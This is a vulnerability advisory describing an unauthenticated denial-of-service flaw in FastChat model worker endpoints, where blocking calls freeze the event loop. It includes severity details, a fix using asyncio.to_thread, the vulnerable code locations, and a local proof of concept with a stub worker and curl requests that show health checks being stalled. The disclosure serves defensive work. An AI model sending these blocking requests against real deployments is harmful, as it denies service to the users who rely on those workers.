# Vulnerability Summary: Blocking Event Loop in FastChat Model Worker Leads to Denial of Service ## Vulnerability Overview **Title**: Denial of Service via Blocking Event Loop in Model Worker (Incomplete Fix for ff66426) **Description**: A single unauthenticated HTTP request to `/worker_generate` or `/worker_get_embeddings` can completely freeze a FastChat model worker for the entire duration of inference. When the event loop is blocked, no other requests—including heartbeats, health checks, and requests from other users—can be processed. This causes the worker to deny service and eventually be deregistered by the controller. **Root Cause**: The root cause was partially fixed in commit `ff66426` for `base_model_worker.py`'s `api.generate()`, but three other instances of the same bug were overlooked. ## Impact Scope - **Affected Product**: FastChat (pip package) - **Affected Versions**: <= 0.2.36 (latest version at reporting time, commit `5a85c5f`) - **Severity**: High - **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - **CWE**: CWE-400: Uncontrolled Resource Consumption **Specific Impacts**: 1. A single HTTP request can freeze the entire model worker—no other requests are processed during inference (seconds to minutes) 2. Heartbeat disruption—blocked event loop prevents heartbeat responses, causing the controller to deregister the worker. All models served by this worker become unavailable to users 3. Cross-model cascade—in `multi_model_worker` deployments, all models served by the affected worker are impacted simultaneously 4. Sustained DoS—continuous blocking requests keep the worker permanently frozen 5. No authentication required—worker endpoints (`/worker_generate`, `/worker_get_embeddings`) are not protected by an API key ## Remediation Wrap synchronous calls with `asyncio.to_thread()` to offload blocking operations to the thread pool: ```python # Fix: wrap synchronous calls with asyncio.to_thread() output = await asyncio.to_thread(worker.generate_gate, params) embedding = await asyncio.to_thread(worker.get_embeddings, params) ``` ## POC Code ### Full Exploitation Code ```python cd /path/to/FastChat python3 -c " import sys, time, uvicorn sys.path.insert(0, '.') import fastchat.serve.base_model_worker as bmw class SlowWorker: def __init__(self): self.model_names = ['test-model'] self.limit_worker_concurrency = 5 self.semaphore = None self.context_len = 4096 def get_status(self): return {'model_names': self.model_names, 'speed': 1, 'queue_length': 0} def generate_gate(self, params): time.sleep(10) return {'text': 'done', 'error_code': 0} def get_embeddings(self, params): time.sleep(10) return {'embedding': [[0.1, 0.2, 0.3]], 'token_num': 3} bmw.worker = SlowWorker() bmw.logger = __import__('logging').getLogger('test') uvicorn.run(bmw.app, host='0.0.0.0', port=21002) & sleep 2 " ``` ### Exploitation Step Code **Step 3 - Exploit vulnerable endpoint `/worker_get_embeddings` (line 218):** ```bash # Terminal A: send a blocking embedding request curl -s -X POST http://localhost:21002/worker_get_embeddings \ -H "Content-Type: application/json" \ -d '{"input":["test"]}' & # Terminal B (within 1 second): try a health check time curl -s -X POST http://localhost:21002/worker_get_status \ -H "Content-Type: application/json" -d '{}' ``` **Step 4 - Verify fixed endpoint `/worker_generate` (line 209) is not blocked:** ```bash # Terminal A: send a generate request (this endpoint was fixed in ff66426) curl -s -X POST http://localhost:21002/worker_generate \ -H "Content-Type: application/json" \ -d '{"prompt":"test"}' & # Terminal B (within 1 second): try a health check time curl -s -X POST http://localhost:21002/worker_get_status \ -H "Content-Type: application/json" -d '{}' ``` ### Original Vulnerable Code Snippets **Location 1 - `multi_model_worker.py` `api.generate()` (line 112):** ```python @app.post("/worker_generate") async def api_generate(request: Request): params = await request.json() await acquire_worker_semaphore() worker = worker_map[params["model"]] output = worker.generate_gate(params) # BLOCKS event loop release_worker_semaphore() return JSONResponse(output) ``` **Location 2 - `base_model_worker.py` `api.get_embeddings()` (line 218):** ```python @app.post("/worker_get_embeddings") async def api_get_embeddings(request: Request): params = await request.json() await acquire_worker_semaphore() embedding = worker.get_embeddings(params) # BLOCKS event loop release_worker_semaphore() return JSONResponse(content=embedding) ``` **Location 3 - `huggingface_api_worker.py` `api.generate()` (line 236):** ```python @app.post("/worker_generate") async def api_generate(request: Request): params = await request.json() worker = worker_map[params["model"]] await acquire_worker_semaphore(worker) output = worker.generate_gate(params) # BLOCKS event loop release_worker_semaphore(worker) return JSONResponse(output) ```